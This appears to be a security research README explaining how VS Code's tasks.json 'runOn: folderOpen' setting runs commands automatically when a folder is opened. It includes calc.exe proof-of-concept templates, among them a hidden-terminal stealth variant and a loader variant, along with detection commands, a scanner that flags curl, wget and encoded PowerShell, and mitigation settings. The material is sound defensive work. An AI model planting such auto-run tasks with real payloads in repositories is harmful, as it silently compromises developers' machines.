-orange){kind=icon}
-4285F4){kind=icon}
π Brought to you by Kurtz
Advanced cryptography and security solutions
A trusted workspace configuration file can execute arbitrary commands the moment you open a folder. No prompts. No warnings. No interaction required.
- Summary
- Affected Software
- How It Works
- Attack Variants
- Real-World Usage
- Impact Assessment
- Reproduction Steps
- Detection Methods
- Mitigation
- Are You Vulnerable?
- Scanner Tool
- FAQ
- References
- Disclaimer
VS Code and derivative IDEs (Cursor, Windsurf, and other Electron-based editors) support a tasks.json workspace configuration that can define tasks to run automatically when a folder is opened. By setting "runOn": "folderOpen" on a task, an attacker can achieve arbitrary command execution the instant a victim opens a malicious repository or project folder in their IDE. The victim does not need to click anything, run any command, or interact with the editor beyond opening the folder. This design feature has been actively exploited in the wild by the Lazarus Group (DPRK) as part of the "Contagious Interview" campaign, targeting developers through trojanized coding challenges and open-source repositories.
| IDE | Vulnerable | Notes |
|---|---|---|
| Visual Studio Code | β Yes | Core feature since tasks API v2.0 |
| Cursor | β Yes | Inherits VS Code task system |
| Windsurf (Codeium) | β Yes | Inherits VS Code task system |
| Kiro (AWS) | β Yes | VS Code-based; inherits task system |
| Antigravity (Google) | β Yes | VS Code-based; inherits task system |
| VSCodium | β Yes | Open-source VS Code fork |
| code-server | β Yes | Browser-based VS Code |
| GitHub Codespaces | May have workspace trust mitigations | |
| Any Electron IDE with VS Code task compat | If they implement the tasks.json spec |
Platforms affected: Windows, macOS, Linux (all platforms where these IDEs run).
VS Code uses .vscode/tasks.json to define build tasks, linters, test runners, and other automation. This is a trusted workspace configuration that developers routinely include in repositories.
The "runOn": "folderOpen" property tells the IDE to execute a task automatically when the workspace is opened:
Developer opens folder
β
βΌ
IDE reads .vscode/tasks.json
β
βΌ
Finds task with "runOn": "folderOpen"
β
βΌ
Executes "command" in shell β ARBITRARY CODE EXECUTION
β
βΌ
Attacker's payload runs with user privileges
- No user interaction β the command runs the instant the folder loads.
- Trusted file path β
.vscode/tasks.jsonis a standard config file that developers expect to see in repos. - Easily hidden β the task can be buried among legitimate build tasks.
- Full user privileges β the command runs as the current user, inheriting all their permissions.
- Cross-platform β different commands can be specified per OS (
windows,linux,osxproperties). - Stealth options β the terminal output can be hidden using presentation settings.
The simplest form. Runs a command directly when the folder opens.
// .vscode/tasks.json
{
"version": "2.0.0",
"tasks": [
{
"label": "build",
"type": "shell",
"command": "calc.exe",
"runOptions": { "runOn": "folderOpen" }
}
]
}Detection difficulty: Easy β the command is plainly visible.
See: variants/1-basic/
Variant 2: Stealth (Hidden Terminal + OS-Specific Payload)
Hides the terminal panel and uses separate OS-specific commands. The command field shows a benign echo, while the real payload is in the OS-specific override.
{
"version": "2.0.0",
"tasks": [
{
"label": "initialize workspace",
"type": "shell",
"command": "echo 'Initializing project...'",
"windows": {
"command": "cmd /c start calc.exe"
},
"presentation": {
"reveal": "never",
"echo": false,
"focus": false,
"panel": "shared",
"close": true
},
"runOptions": { "runOn": "folderOpen" }
}
]
}Detection difficulty: Medium β requires checking OS-specific overrides and presentation settings.
See: variants/2-stealth/
The tasks.json calls a legitimate-looking script (e.g., a Python setup file) that contains the actual payload. This adds a layer of indirection that defeats simple tasks.json scanning.
// tasks.json just runs a "setup" script
{
"version": "2.0.0",
"tasks": [
{
"label": "setup environment",
"type": "shell",
"command": "python",
"args": ["scripts/setup.py"],
"runOptions": { "runOn": "folderOpen" }
}
]
}# scripts/setup.py β looks legitimate but contains a payload
import subprocess, platform
def setup_environment():
"""Configure project dependencies."""
print("Setting up development environment...")
# ... legitimate-looking code ...
if platform.system() == "Windows":
subprocess.Popen(["calc.exe"]) # Payload buried in setup logicDetection difficulty: Hard β tasks.json looks benign, payload is in a separate file.
See: variants/3-loader/
The North Korean APT group Lazarus (tracked as FAMOUS CHOLLIMA, UNC4899) has weaponized this technique as part of the "Contagious Interview" campaign:
- Target: Software developers, primarily those applying for jobs or contributing to open-source projects.
- Method: Victims receive a "coding challenge" or are directed to clone a trojanized GitHub repository. The repo contains a malicious
.vscode/tasks.jsonthat executes a payload on folder open. - Payload chain: The initial task typically runs a script that downloads and executes further-stage malware (infostealers, RATs, cryptocurrency wallet drainers).
- Scale: Dozens of trojanized npm packages and GitHub repositories have been identified.
- Microsoft Threat Intelligence (Feb 2025): Documented FAMOUS CHOLLIMA using VS Code tasks.json in attacks targeting developers through fake job interviews.
- Abstract Security: Detailed analysis of the folderOpen execution mechanism and detection strategies.
- SecurityJoes / PaloAlto Unit42: Tracked the broader Contagious Interview campaign infrastructure.
| Factor | Rating |
|---|---|
| Ease of exploitation | Very Easy β just add a JSON file to a repo |
| User interaction required | None β opening the folder is sufficient |
| Privilege escalation | Runs as current user (often admin on dev machines) |
| Stealth potential | High β terminal can be hidden, payload can be delegated |
| Affected population | Millions of VS Code / Cursor / Windsurf users |
| Active exploitation | Yes β Lazarus Group / Contagious Interview |
- Execute any command as the current user
- Download and run additional malware
- Exfiltrate source code, credentials, SSH keys, browser data
- Install persistent backdoors
- Pivot to internal networks
- Steal cryptocurrency wallet keys
IMPORTANT: These steps use
calc.exe(Windows Calculator) as a safe, harmless payload. Never test with real malware.
-
Create a new folder anywhere on your system:
mkdir test-vuln && cd test-vuln mkdir .vscode -
Create
.vscode/tasks.jsonwith this content:{ "version": "2.0.0", "tasks": [ { "label": "build", "type": "shell", "command": "calc.exe", "runOptions": { "runOn": "folderOpen" } } ] } -
Open the folder in VS Code / Cursor / Windsurf:
code test-vuln -
Result: Windows Calculator should open automatically without any user interaction beyond opening the folder.
- You may have Workspace Trust enabled (VS Code will show a trust prompt).
- Check
Settings > task.allowAutomaticTasksβ if set to"off", auto-tasks are disabled. - You previously dismissed the auto-task with "Never" for this workspace.
Use the PoCs in the variants/ directory. Each one is self-contained β just open the variant folder in your IDE.
Search for tasks.json files containing folderOpen:
# Linux/macOS
find /path/to/repos -path '*/.vscode/tasks.json' -exec grep -l 'folderOpen' {} \;
# Windows PowerShell
Get-ChildItem -Path C:\repos -Recurse -Filter tasks.json |
Where-Object { $_.FullName -match '\.vscode' } |
Where-Object { (Get-Content $_.FullName -Raw) -match 'folderOpen' }This repo includes a scanner that checks for malicious patterns:
python scanner/scan.py /path/to/checkSee: Scanner Tool
Use the included YARA rules for file-level detection:
detection/yara_rules.yar
Use the included Sigma rule for log-based detection:
detection/sigma_rule.yml
Monitor for child processes spawned by VS Code / Cursor / Windsurf shell processes, particularly:
powershell.exeorpwsh.exewith encoded commandscmd.exespawning network utilitiespython/noderunning scripts from.vscodeadjacent paths- Any process making network connections immediately after IDE launch
In VS Code / Cursor / Windsurf settings (settings.json):
{
"task.allowAutomaticTasks": "off"
}Or via UI: Settings > search task.allowAutomaticTasks > set to off.
Ensure Workspace Trust is enabled (VS Code default):
{
"security.workspace.trust.enabled": true
}This prompts you before trusting a new workspace. Do not blindly click "Trust" when opening unfamiliar repos.
Before opening any cloned repo in your IDE, check for .vscode/tasks.json:
cat .vscode/tasks.json 2>/dev/null || echo "No tasks.json found"- Deploy the
task.allowAutomaticTasks: "off"setting via Group Policy or MDM. - Implement pre-commit hooks that flag
runOn: folderOpenin tasks.json. - Add YARA rules to endpoint detection.
- Train developers to recognize this attack vector.
- See:
mitigations/for detailed enterprise guidance.
Run this quick check:
Open your IDE and go to Settings. Search for task.allowAutomaticTasks.
| Value | Status |
|---|---|
"off" |
Protected β auto-tasks will not run |
"on" |
Vulnerable β auto-tasks run without prompt |
"prompt" (default in some versions) |
Partially protected β you will be asked, but may click through |
Search for security.workspace.trust.enabled in Settings.
| Value | Status |
|---|---|
true (default) |
Partially protected β new folders require trust approval |
false |
Vulnerable β all folders are trusted automatically |
# Scan your projects directory for existing threats
python scanner/scan.py ~/projectsThis repository includes a scanner in both Python and PowerShell.
# Scan a directory recursively
python scanner/scan.py /path/to/scan
# Examples
python scanner/scan.py ~/projects
python scanner/scan.py C:\Users\dev\repos
python scanner/scan.py .The scanner checks for:
runOn: folderOpentriggers- Suspicious commands (
powershell -EncodedCommand,curl,wget,msiexec,Start-Process, etc.) - Mismatched
commandvswindows.command/linux.command/osx.command(stealth technique) - Base64-encoded payloads
- Hidden presentation settings (
reveal: "never",echo: false) - Script execution (Python, Node, Bash scripts called by tasks)
Output uses color-coded severity: SAFE, WARNING, DANGEROUS.
.\scanner\scan.ps1 -Path C:\Users\dev\reposQ: Is this a bug or a feature?
A: It is a feature β VS Code intentionally supports runOn: folderOpen for developer convenience. The security issue is that it enables a low-friction attack vector, especially in contexts where developers routinely clone and open untrusted repositories. Microsoft has added mitigations (Workspace Trust) but the underlying capability remains.
Q: Does Workspace Trust fully protect me? A: Partially. If Workspace Trust is enabled (the default), VS Code will prompt you before trusting a new folder. However, many developers habitually click "Trust" without reviewing workspace configurations, and some users disable Workspace Trust entirely because of the frequent prompts.
Q: Can this attack be executed through a GitHub PR?
A: Yes. If a pull request adds or modifies .vscode/tasks.json and a reviewer checks out the PR branch and opens it in their IDE, the payload will execute.
Q: Are VS Code extensions involved? A: No. This attack uses only built-in VS Code task functionality. No extensions are required.
Q: Why calc.exe?
A: calc.exe (Windows Calculator) is the standard benign payload for proof-of-concept demonstrations. It proves code execution without causing any harm. All PoCs in this repository use only calc.exe.
Q: Can this be used on macOS/Linux?
A: Yes. The command field runs in the system shell. On macOS you could use open -a Calculator, on Linux xcalc or any other command. The windows, linux, and osx properties allow OS-specific commands in a single tasks.json.
- Microsoft: FAMOUS CHOLLIMA targets developers with malicious VS Code projects (2025)
- Abstract Security: VS Code tasks.json folderOpen Attack Analysis
- MITRE ATT&CK T1204.001 β User Execution: Malicious Link
- MITRE ATT&CK T1059 β Command and Scripting Interpreter
- VS Code Tasks Documentation β runOn property
- Lazarus Group / Contagious Interview β CISA Advisory
- SecurityJoes β Contagious Interview Campaign Analysis
- Unit42 β DPRK IT Workers and Developer Targeting
This repository is provided strictly for educational and defensive security research purposes. The proof-of-concept demonstrations use only benign payloads (calc.exe) and are designed to raise awareness of this attack vector.
- Do not use these techniques for unauthorized access to systems.
- Do not modify these PoCs to include malicious payloads.
- The authors are not responsible for misuse of this information.
- All techniques documented here are based on publicly known, well-documented attack methods.
- If you discover this vulnerability being exploited in the wild, report it to the affected organization and relevant authorities.
Responsible Disclosure: This documents a known, publicly disclosed attack technique that has been actively exploited in the wild. Microsoft is aware of this capability and has implemented partial mitigations (Workspace Trust). The purpose of this repository is to help defenders detect and prevent these attacks.
Contributions are welcome! If you have:
- Additional detection rules (Splunk, ELK, etc.)
- Scanner improvements
- New attack variants discovered in the wild
- Mitigation strategies for other IDEs
Please open an issue or submit a pull request.
Created for the security research community. Stay safe, audit your workspaces. π‘οΈ
{ "version": "2.0.0", "tasks": [ { "label": "build", "type": "shell", "command": "calc.exe", // <-- Arbitrary command "runOptions": { "runOn": "folderOpen" // <-- Triggers on folder open } } ] }